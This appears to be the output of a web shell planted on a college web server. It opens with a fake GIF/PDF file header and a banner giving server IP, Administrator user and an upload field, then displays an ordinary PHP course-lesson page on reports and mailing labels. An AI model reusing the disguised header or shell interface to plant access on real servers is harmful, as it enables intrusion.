GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/_Archive/CST1600/ |
Upload File : |
<? // CST1600/Lesson1-6.php $TRACK = "<b>".basename(__FILE__)."</b> (".__FILE__.")\n<ol>\n"; ini_set('include_path',"/Data_WWW/cst.ridgewater.edu/".PATH_SEPARATOR."/Data_WWW/CST/".PATH_SEPARATOR.ini_get('include_path')); // ** Add the DOCUMENT_ROOT to the include_path. include("Application.phpinc"); include('Course/courseInfo.phpinc'); include('classInfo.phpinc'); $assignmentNumber = "1-6"; $assignmentType = "Lesson"; $assignmentTitle = "Creating Reports and Mailing Labels"; //$evaluationNumber = ""; $evaluationType = "Lab"; //$evaluationTitle = ""; if (!isset($evaluationTitle) || $evaluationTitle == "") { $evaluationTitle = $assignmentTitle; } if (!isset($evaluationNumber) || $evaluationNumber == "") { $evaluationNumber = $assignmentNumber; } if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; } else { $assignmentName = $assignmentType.$assignmentNumber; } if (strlen($evaluationNumber) == 1) { $evaluationName = $evaluationType."0".$evaluationNumber; } else { $evaluationName = $evaluationType.$evaluationNumber; } if ($evaluationTitle != '') $evaluationTitle = ': '.$evaluationTitle; $title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle; $levelChapter = split('\.',$assignmentNumber); $title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; $thisFile = __FILE__; include('Common/pageHeader.phpinc'); include('Login/authenticate.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; $thisFile = __FILE__; include('Common/sectionHeader.phpinc'); ?> <p> <fieldset><legend>Description</legend><span class="normal"> </span></fieldset> <fieldset class="pio"><legend>Personalized Instruction</legend><span class="normal"> <ol start="1" class="pio"> <li>Create a folder called <b><?=$evaluationName?></b> in your CST1600 folder and keep all files modified or created for this <?=$assignmentType?> there.</li> <li>Read Level <?=$levelChapter[0]?>, Chapter <?=$levelChapter[1]?> <i><?=$assignmentTitle?></i> in <?=$textbook['Title1']?><?=$textbook['Edition1Edition']?>.</li> <li>Perform all tutorials in Level <?=$levelChapter[0]?>, Chapter <?=$levelChapter[1]?>.</li> <li>Perform all Projects in Level <?=$levelChapter[0]?>, Chapter <?=$levelChapter[1]?>.</li> <li>Perform all Skills check Assessments in Level <?=$levelChapter[0]?>, Chapter <?=$levelChapter[1]?>.</li> <li>Perform the Case study at the end of Level <?=$levelChapter[0]?>, Chapter <?=$levelChapter[1]?>.</li> </ol> </span></fieldset> <fieldset class="pio"><legend>Objectives</legend><span class="normal"> <ol class="obj pio" start="3"> <!-- Introduction 3 --> </ol> </span></fieldset> <fieldset><legend>Evaluations</legend><span class="normal"> Submit the Case study and other files for evaluation. <ol type="1"> <li>Zip up the <b><?=$evaluationName?></b> folder into a file called <b><?=$evaluationName?>.zip</b>.</li> <li>Send the <b><?=$evaluationName?>.zip</b> file as an attachment using email to <b>jim.martinson@ridgewater.edu</b> with a subject of <span style="white-space:nowrap;"><b><?=$courseNumber?> <?=$evaluationName?> submission</b></span>.</li> <li>If you are not using Ridgewater's email system then enter your name as the first line of the message.</li> </ol> </span></fieldset> <? include('Course/ExampleFlles.phpinc'); include('ReferencesResources.phpinc'); $thisFile = __FILE__; include('Common/sectionFooter.phpinc'); $thisFile = __FILE__; include('Common/pageFooter.phpinc'); if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol></li>\n"; ?>